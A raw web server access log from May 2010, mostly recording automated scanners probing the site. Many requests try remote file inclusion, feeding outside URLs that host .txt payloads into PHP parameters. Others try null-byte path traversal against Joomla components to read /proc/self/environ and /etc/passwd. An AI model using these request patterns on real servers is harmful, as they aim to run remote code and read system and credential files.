121.88.4.141 - - [28/May/2010:05:14:47 -0500] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:05:14:47 -0500] "GET ///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:05:14:51 -0500] "GET /logs/access_log.1271548800///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.174.62.150 - - [28/May/2010:05:15:04 -0500] "GET /logs/access_log.1274227200/?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
121.88.4.141 - - [28/May/2010:05:18:33 -0500] "GET /logs/access_log.1271548800///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:05:18:33 -0500] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:05:18:33 -0500] "GET ///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
195.190.166.35 - - [28/May/2010:05:20:20 -0500] "GET /logs/access_log.1238803200//errors.php?error=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
195.190.166.35 - - [28/May/2010:05:20:20 -0500] "GET /logs//errors.php?error=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
195.190.166.35 - - [28/May/2010:05:20:20 -0500] "GET //errors.php?error=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
195.190.166.35 - - [28/May/2010:05:20:43 -0500] "GET /logs/access_log.1238803200%20//errors.php?error=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
222.122.52.80 - - [28/May/2010:05:21:08 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:05:21:09 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:05:21:09 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.122.52.80 - - [28/May/2010:05:21:09 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.241.176.6 - - [28/May/2010:05:21:44 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:21:45 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.227.127.169 - - [28/May/2010:05:21:54 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cskingphotography.com/P1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
212.227.127.169 - - [28/May/2010:05:21:54 -0500] "GET /logs/access_log.1271548800//skin/zero_vote/error.php?dir=http://www.cskingphotography.com/P1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.227.127.169 - - [28/May/2010:05:21:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cskingphotography.com/P1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.227.127.169 - - [28/May/2010:05:22:56 -0500] "GET /logs/access_log.1271203200//skin/zero_vote/error.php?dir=http://www.cskingphotography.com/P1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.227.127.169 - - [28/May/2010:05:22:57 -0500] "GET /logs/access_log.1270944000//skin/zero_vote/error.php?dir=http://www.cskingphotography.com/P1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:05:23:51 -0500] "GET ///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:05:23:51 -0500] "GET /logs/access_log.1271548800///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:05:23:51 -0500] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
212.241.176.6 - - [28/May/2010:05:23:58 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:23:58 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.250.255.243 - - [28/May/2010:05:26:14 -0500] "GET /logs/access_log.1258502400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.241.176.6 - - [28/May/2010:05:27:19 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:27:19 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
209.44.120.3 - - [28/May/2010:05:27:24 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
207.46.13.48 - - [28/May/2010:05:27:29 -0500] "GET /logs/access_log.1248307200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.44.120.2 - - [28/May/2010:05:28:47 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:05:28:47 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
202.29.86.7 - - [28/May/2010:05:29:31 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 317 "-""Mozilla/5.0"
202.29.86.7 - - [28/May/2010:05:29:31 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 312 "-""Mozilla/5.0"
202.29.86.7 - - [28/May/2010:05:29:31 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 339 "-""Mozilla/5.0"
202.29.86.7 - - [28/May/2010:05:29:31 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.241.176.6 - - [28/May/2010:05:30:42 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:30:42 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.199.244 - - [28/May/2010:05:32:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
84.40.30.37 - - [28/May/2010:05:32:23 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
84.40.30.37 - - [28/May/2010:05:32:23 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
84.40.30.37 - - [28/May/2010:05:32:23 -0500] "GET /logs/access_log.1270598400//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
207.46.199.244 - - [28/May/2010:05:32:24 -0500] "GET /artwork/huntsville.jpg HTTP/1.1" 200 117865 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.204.186 - - [28/May/2010:05:32:28 -0500] "GET /logs/access_log.1264896000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
84.40.30.37 - - [28/May/2010:05:32:41 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
84.40.30.37 - - [28/May/2010:05:32:41 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
84.40.30.37 - - [28/May/2010:05:32:41 -0500] "GET /logs/access_log.1270598400//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.55.146.200 - - [28/May/2010:05:35:02 -0500] "GET //errors.php?error=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
72.55.146.200 - - [28/May/2010:05:35:02 -0500] "GET /logs//errors.php?error=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
216.7.185.19 - - [28/May/2010:05:36:43 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7289 "-""libwww-perl/5.810"
216.7.185.19 - - [28/May/2010:05:36:43 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
216.7.185.19 - - [28/May/2010:05:36:49 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7289 "-""libwww-perl/5.810"
216.7.185.19 - - [28/May/2010:05:36:49 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
212.241.176.6 - - [28/May/2010:05:37:34 -0500] "GET /logs/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:37:34 -0500] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:38:32 -0500] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:38:41 -0500] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:39:25 -0500] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:39:33 -0500] "GET /logs/access_log.1274227200/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:39:33 -0500] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:39:34 -0500] "GET /logs/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:39:34 -0500] "GET /logs/access_log.1274313600/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:40:24 -0500] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
123.243.67.208 - - [28/May/2010:05:42:07 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
212.241.176.6 - - [28/May/2010:05:44:05 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:44:05 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.250.255.243 - - [28/May/2010:05:45:25 -0500] "GET /logs/access_log.1220572800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.241.176.6 - - [28/May/2010:05:45:43 -0500] "GET /logs/access_log.1274227200/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:45:43 -0500] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:45:44 -0500] "GET /logs/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:46:44 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:46:52 -0500] "GET /logs/access_log.1274313600/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:46:53 -0500] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:46:54 -0500] "GET /logs/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:47:14 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:47:23 -0500] "GET /logs/access_log.1274227200/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:47:38 -0500] "GET /logs/access_log.1274227200/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:47:39 -0500] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:47:39 -0500] "GET /logs/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
209.44.120.3 - - [28/May/2010:05:47:57 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:05:47:57 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:05:47:57 -0500] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7294 "-""libwww-perl/5.805"
212.241.176.6 - - [28/May/2010:05:47:59 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:48:49 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:48:49 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:48:56 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:49:16 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:49:17 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
216.7.185.19 - - [28/May/2010:05:49:18 -0500] "GET /logs/?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7289 "-""libwww-perl/5.810"
216.7.185.19 - - [28/May/2010:05:49:18 -0500] "GET /?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
216.7.185.19 - - [28/May/2010:05:49:18 -0500] "GET /logs/?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7289 "-""libwww-perl/5.810"
216.7.185.19 - - [28/May/2010:05:49:18 -0500] "GET /?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
207.46.13.42 - - [28/May/2010:05:49:28 -0500] "GET /memorial/ HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.145.89 - - [28/May/2010:05:49:56 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:49:57 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:50:10 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:50:11 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.199.182 - - [28/May/2010:05:50:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.145.89 - - [28/May/2010:05:50:48 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:50:49 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:51:46 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:51:46 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:52:45 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:52:45 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:52:45 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
174.133.201.194 - - [28/May/2010:05:54:04 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:05:54:04 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.58.188.125 - - [28/May/2010:05:54:52 -0500] "GET //errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
207.58.188.125 - - [28/May/2010:05:54:52 -0500] "GET /logs//errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
212.241.176.6 - - [28/May/2010:05:56:16 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:56:16 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:56:16 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.196.180.250 - - [28/May/2010:05:56:31 -0500] "GET /logs//errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
213.196.180.250 - - [28/May/2010:05:56:31 -0500] "GET //errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
204.68.97.131 - - [28/May/2010:05:57:32 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5"
91.121.145.89 - - [28/May/2010:05:57:47 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:05:57:47 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:57:47 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:05:57:48 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:57:55 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:57:55 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:58:01 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:58:02 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:58:02 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:05:58:06 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:05:58:06 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:05:58:11 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:58:11 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:58:11 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:05:58:11 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
114.108.151.149 - - [28/May/2010:05:58:11 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:05:58:11 -0500] "GET /logs/access_log.1271548800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:05:58:11 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
